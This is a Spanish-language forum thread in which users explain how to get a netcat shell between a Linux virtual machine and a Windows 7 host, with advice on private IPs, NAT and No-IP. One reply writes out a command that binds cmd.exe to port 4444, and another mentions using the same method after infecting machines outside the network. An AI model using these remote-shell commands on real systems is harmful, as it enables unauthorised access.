como utilizo netcat y SSL desde una maquina virtual? que IP poner?

Iniciado por Synth3tik0, 18 Enero 2013, 01:09 AM

0 Miembros y 1 Visitante están viendo este tema.

Synth3tik0

quiero hacer un netcat inverso desde la maquina virtual que corre linux y que se conecte a mi maquina principal que usa windows 7 . Tengo el vmware player. Tengo que colocar mi ip publica en el netcat  o la ip local que me asigno el router? he probado con ambas pero me manda un conexion refused :huh: .Asumo que si no se va conectar desde el exterior no hay necesidad de abrir puertos en el router verdad? alguna idea  o solucion?
..........

RevangelyonX

Hola,

Las máquinas se ven entre ellas?

Tu windows tiene que tener netcat así:
Nc -vnlp 4444 -e cmd.exe

Tu linux
Nc -nv ip.win7 4444

Esto te devuelve una reverse shell en tu linux. Es decir accederas al cmd.exe de win desde tu linux.

Salu2

Pd: se m olvidava
ips locales
Just Linux
OSCP certified

kub0x

Eso es. A modo local solo tienes que tener en cuenta la IP privada. En cambio si infectaras una máquina que está fuera de tu red, deberías abrir puertos y hacer que esa máquina se conecte a tí, es decir, tu deberías aceptar cualquier conexión en el puerto sobre el que estás escuchando para de esta forma obtener la shell remota.

La manera que ha puesto RevangelyonX es la forma correcta de emplear la conexión inversa, aunque el parámetro -l significa que la Shell escuchará una vez y -L que escucará siempre.

Saludos!
Viejos siempre viejos,
Ellos tienen el poder,
Y la juventud,
¡En el ataúd! Criaturas Al poder.

Visita mi perfil en ResearchGate


RevangelyonX

Hola,

Muy cierto kub0x es que netcat de linux no tiene ese parametro.
Gracias por recalcarlo ;)

Salu2
Just Linux
OSCP certified

Synth3tik0

y por ejemplo si ejecuto  dos noIP al mismo tiempo, uno en mi maquina virtual y otro en la maquina  principal. Segun yo tengo entendido que no puedo "anclar" dos o mas programas al mismo puerto, pero que pasaria si pusiera a la escucha el netcat en el puerto ejm (500) tanto en la maquina virtual con en la  maquina principal, cual de los dos recibiria la conexion?
..........

MauroMasciar

#5
Cita de: ๖ۣۜPム||ムđ1ůɱ en 19 Enero 2013, 03:29 AM
y por ejemplo si ejecuto  dos noIP al mismo tiempo, uno en mi maquina virtual y otro en la maquina  principal. Segun yo tengo entendido que no puedo "anclar" dos o mas programas al mismo puerto, pero que pasaria si pusiera a la escucha el netcat en el puerto ejm (500) tanto en la maquina virtual con en la  maquina principal, cual de los dos recibiria la conexion?

Tendrías escuchando el NC en una PC en el puerto 500 y en la virtual en su puerto 500, no pasa nada raro.
Cuando te quieras conectar especificas IP y Puerto. (Ip privada, obviamente)
Lo "malo" es cuando dos programas quieren usar un mismo puerto en una misma PC.

Y el No-ip hasta donde yo se, redirige el nombre a tu ip pública, así que desde una maquina exterior te conectaría a la PC que tenga el puerto abierto.
Tutto ha oceani da attraversare mentre hanno il coraggio di farlo Avventato? Ma sanno sogni di limiti

Twitter: @MauroMasciar

RevangelyonX

Aqui hay un problema de conceptos.
Si tu tienes una maquina virtual es como tener una maquina mas. Suponiendo que tengas la iface en modo bridge tienes una ip mas en tu rango por lo tanto tienes

1.100 maquina fisica
1.102 la virtual por ejemplo

Utilizar no-ip es para crear un nombre de dominio asociado a tu IP publica. Asi pues tienes que crear un fordward / natting hacia una de las ips privadas. Sólo pasaras hacia una IP privada.

Es un tema de configurar tu router / firrwall.

Salu2
Just Linux
OSCP certified